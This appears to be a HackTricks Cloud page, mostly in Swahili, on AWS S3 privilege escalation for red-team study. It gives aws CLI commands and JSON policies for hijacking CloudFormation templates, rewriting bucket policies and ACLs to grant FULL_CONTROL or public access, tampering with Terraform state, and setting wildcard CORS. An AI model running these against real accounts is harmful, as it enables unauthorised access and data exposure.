HackTricks CloudAWS - S3 Privesc
Reading time: 7 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
S3
s3:PutBucketNotification, s3:PutObject, s3:GetObject
Mshambulizi aliye na ruhusa hizo kwa buckets muhimu anaweza kuiba rasilimali na kupandisha ruhusa.
Kwa mfano, mshambulizi aliye na ruhusa hizo kwa cloudformation bucket iitwayo "cf-templates-nohnwfax6a6i-us-east-1" ataweza kudukua deployment. Ufikiaji unaweza kutolewa kwa sera ifuatayo:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:PutBucketNotification",
"s3:GetBucketNotification",
"s3:PutObject",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::cf-templates-*/*",
"arn:aws:s3:::cf-templates-*"
]
},
{
"Effect": "Allow",
"Action": "s3:ListAllMyBuckets",
"Resource": "*"
}
]
}
Na hijack inawezekana kwa sababu kuna dirisha dogo la muda kutoka wakati template inapopakuliwa kwenye bucket hadi wakati template inatumiwa/deployed. Mshambuliaji anaweza tu kuunda lambda function kwenye akaunti yake ambayo itaanzishwa wakati notisi ya bucket itapotumwa, na hijacks content ya hiyo bucket.
.png)
The Pacu module cfn__resouce_injection inaweza kutumika kuendesha mashambulizi haya kwa otomatiki.
Kwa habari zaidi angalia utafiti wa awali: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/
s3:PutObject, s3:GetObject
Hizi ni ruhusa za kupata na kupakia objects kwenye S3. Huduma mbalimbali ndani ya AWS (na nje yake) hutumia hifadhi ya S3 kuhifadhi config files.
Mshambuliaji mwenye read access kwao anaweza kupata taarifa nyeti.
Mshambuliaji mwenye write access kwao anaweza kubadilisha data ili kutumia vibaya huduma fulani na kujaribu kupandisha ruhusa.
Hapa kuna mifano:
- Ikiwa EC2 instance inahifadhi user data in a S3 bucket, mshambuliaji anaweza kuibadilisha ili execute arbitrary code inside the EC2 instance.
s3:PutObject, s3:GetObject (optional) over terraform state file
Ni jambo la kawaida kuwa state files za terraform zinazonaswa kwenye blob storage za watoa huduma za cloud, mfano AWS S3. Kiambishi faili cha state file ni .tfstate, na majina ya bucket mara nyingi pia yanaonyesha kuwa zinajumuisha terraform state files. Kawaida, kila akaunti ya AWS ina bucket moja ya aina hiyo kuhifadhi state files zinazoonyesha hali ya akaunti.
Vilevile, kwa akaunti za dunia halisi karibu daima developers wote wana s3:* na wakati mwingine hata watumiaji wa biashara wana s3:Put*.
Hivyo, ukibarikiwa na ruhusa zilizotajwa juu ya faili hizi, kuna njia ya kushambulia inayokuwezesha kupata RCE kwenye pipeline ukiwa na ruhusa za terraform - mara nyingi AdministratorAccess, na kukufanya wewe kuwa msimamizi wa akaunti ya cloud. Pia, unaweza kutumia njia hiyo kufanya mashambulio ya denial of service kwa kuifanya terraform kufuta rasilimali halali.
Fuata maelezo katika sehemu ya Abusing Terraform State Files ya ukurasa wa Terraform Security kwa kodi ya exploit inayotumika moja kwa moja:
s3:PutBucketPolicy
Mshambuliaji, ambaye anahitaji kuwa from the same account, vinginevyo hitilafu The specified method is not allowed will trigger, kwa ruhusa hii atakuwa na uwezo wa kujipa ruhusa zaidi juu ya bucket(s) kumruhusu kusoma, kuandika, kubadilisha, kufuta na kufichua buckets.
# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>
## JSON giving permissions to a user and mantaining some previous root access
{
"Id": "Policy1568185116930",
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:root"
},
"Action":"s3:ListBucket",
"Resource":"arn:aws:s3:::somebucketname"
},
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:user/username"
},
"Action":"s3:*",
"Resource":"arn:aws:s3:::somebucketname/*"
}
]
}
## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
"Id": "Policy1568185116930",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1568184932403",
"Action": [
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome",
"Principal": "*"
},
{
"Sid": "Stmt1568185007451",
"Action": [
"s3:GetObject"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome/*",
"Principal": "*"
}
]
}
s3:GetBucketAcl, s3:PutBucketAcl
Attacker anaweza kutumia vibaya ruhusa hizi ili kumpa ufikiaji zaidi kwa buckets maalum.
Kumbuka kwamba attacker haahitaji kuwa kutoka akaunti ile ile. Zaidi ya hayo, ufikiaji wa kuandika
# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json
##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
s3:GetObjectAcl, s3:PutObjectAcl
Mshambuliaji anaweza kutumia vibaya ruhusa hizi kumruhusu kupata ufikiaji zaidi wa objects maalum ndani ya buckets.
# Update bucket object ACL
aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json
##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
s3:GetObjectAcl, s3:PutObjectVersionAcl
Mshambulizi mwenye vibali hivi anatarajiwa kuweza kuweka Acl kwa toleo maalum la object.
aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
s3:PutBucketCORS
Mshambulizi mwenye ruhusa ya s3:PutBucketCORS anaweza kubadilisha usanidi wa bucket wa CORS (Cross-Origin Resource Sharing), ambao unadhibiti ni vikoa gani vya wavuti vinaweza kufikia endpoints zake. Ikiwa wataweka sera yenye kuruhusu, tovuti yoyote inaweza kutuma maombi ya moja kwa moja kwa bucket na kusoma majibu kutoka kwa kivinjari.
Hii ina maana kwamba, iwezekanavyo, ikiwa mtumiaji aliyethibitishwa wa programu ya wavuti inayohost kutoka kwa bucket atatembelea tovuti ya mshambulizi, mshambulizi anaweza kutumia sera ya CORS inayoruhusu na, kulingana na programu, kupata taarifa za wasifu za mtumiaji au hata kudukua akaunti yake.
aws s3api put-bucket-cors \
--bucket <BUCKET_NAME> \
--cors-configuration '{
"CORSRules": [
{
"AllowedOrigins": ["*"],
"AllowedMethods": ["GET", "PUT", "POST"],
"AllowedHeaders": ["*"],
"ExposeHeaders": ["x-amz-request-id"],
"MaxAgeSeconds": 3000
}
]
}'
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.